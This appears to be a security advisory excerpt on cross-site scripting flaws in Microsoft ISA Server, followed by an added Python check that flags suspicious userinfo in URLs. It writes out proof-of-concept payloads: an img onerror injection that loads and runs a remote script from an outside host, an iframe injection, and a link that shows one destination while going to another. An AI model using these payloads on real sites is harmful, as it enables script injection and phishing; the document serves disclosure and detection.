Microsoft ISA Server Cross-Site Scripting Vulnerabilities
The following proof-of-concept was provided:

http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0

The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is protected by an ISA Server installation.

http://<iframe>:test@[site]/test

The exploit provided for BID 4486 will also reportedly work for this vulnerability.

An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination:

<A href="http://www.example.com%09%09%09@%09%09%09%09%09%09 09www.malware.com">http://www.example.com</A>
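All three proof-of-concept URLs above carry their payload in the userinfo part of the authority (the text before the last "@"), either as HTML markup or as a hostname padded with encoded tabs. The following check for proxy logs or link targets is an added example, not part of the original advisory or any Microsoft tooling; the function name, finding labels and sample URLs are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Authority = everything between "scheme://" and the first "/", "?" or "#".
AUTHORITY_RE = re.compile(r"^[a-z][a-z0-9+.-]*://([^/?#]*)", re.I)
HOSTLIKE_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
MARKUP_RE = re.compile(r"""[<>"']""")
CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")


def audit_url(url):
    """Return a list of findings for the userinfo/host parts of `url`."""
    m = AUTHORITY_RE.match(url)
    if not m or "@" not in m.group(1):
        return []  # no userinfo component, nothing to check
    raw_userinfo, raw_host = m.group(1).rsplit("@", 1)
    # Decode once so %09, %27 etc. are seen as the characters they represent.
    userinfo, host = unquote(raw_userinfo), unquote(raw_host)
    findings = []
    if MARKUP_RE.search(userinfo):
        findings.append("markup-in-userinfo")
    if CONTROL_RE.search(userinfo + host):
        findings.append("whitespace-in-authority")
    # A username that looks like a DNS name but is not the real host is the
    # "true status, false destination" pattern.
    user = userinfo.split(":", 1)[0].strip()
    if HOSTLIKE_RE.match(user) and user.lower() != host.strip().lower():
        findings.append("hostlike-userinfo")
    return findings


# Constructed sample URLs (not taken from real traffic).
SAMPLES = [
    "http://<iframe>:test@intranet.example/test",
    "http://www.example.com%09%09%09@%09%09www.example.net/",
    "http://www.example.com/index.html",
    "ftp://backup:secret@files.example.org/",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_url(sample) or "clean", sample)
```
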